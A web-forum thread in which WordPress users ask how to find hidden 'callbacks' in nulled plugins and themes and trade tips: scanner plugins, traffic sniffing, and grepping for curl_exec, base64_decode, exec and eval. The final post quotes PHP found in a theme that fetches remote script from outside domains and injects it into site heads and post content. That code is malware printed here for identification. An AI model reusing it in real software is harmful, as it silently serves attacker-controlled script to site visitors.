Callback/Null Script checker

Gamboloyd

Registered Member
Joined
Sep 16, 2010
Messages
81
Reaction score
37
Hi folks. Is there any way to check online if a plugin has callbacks in it? I'm sure I read it in a thread here ages ago but for the love of all things shiny I can't find it. Any ideas?
 
Hi folks. Is there any way to check online if a plugin has callbacks in it? I'm sure I read it in a thread here ages ago but for the love of all things shiny I can't find it. Any ideas?

TAC (theme authenticity checker) will do a check of your theme (you'll find it via the WP plugins repository), but not 100% sure if it checks plugin files also.

There's also an Antivirus for WP (again, from general repository), which, afaik, checks ALL of your WP files for virii or malware.
 
Thanks. Needed to know as I keep wondering if some of the nulled software I acquire is doing anything dubious. :eek:
 
This is probably complicated but you'll be sure.

Install the script on your localhost and use a http sniffer to monitor the requests.
 
Excuse my ignorance, but what does a callback actually do?
 
One way would be to search all files for these functions (one at a time):
PHP:
file_get_contents
http_get
curl_exec
base64_decode
exec
 
One way would be to search all files for these functions (one at a time):
PHP:
file_get_contents
http_get
curl_exec
base64_decode
exec

Exactly. Also look for http://
I use FileSeek from
Code:
http://www.fileseek.ca/
, nice freeware with extra functions, looking for lines in all files and listing them for further editing.
 
Thanks loads folks. I will check out your suggestions. No harm in a bit of healthy paranoia :)
 
Excuse my ignorance, but what does a callback actually do?

Some plugins are licensed by domain or for a limited number of domains so the plugin communicates the serial number to the developer. This way he knows if it's being used where it shouldn't.
 
exploit scanner
Code:
http://wordpress.org/extend/plugins/exploit-scanner/
 
One way would be to search all files for these functions (one at a time):
PHP:
file_get_contents
http_get
curl_exec
base64_decode
exec


and "eval" as money people are using javascript eval() function to hide something ;)
 
If they encrypted the files , so how do we find it?
I think most of them are encrypted..
 
So what does a 'callback' script looks like;

For example, I just searched the entire folder for "curl_exec" and i found the following;

/*-----------------------------------------------------------------------------------*/
/* Directory
/*-----------------------------------------------------------------------------------*/if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false) {$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}
add_filter('the_content', 'ins_php_in_post');
Is this some sort of call back in this case? Please advise. Thanks
 
Back
Top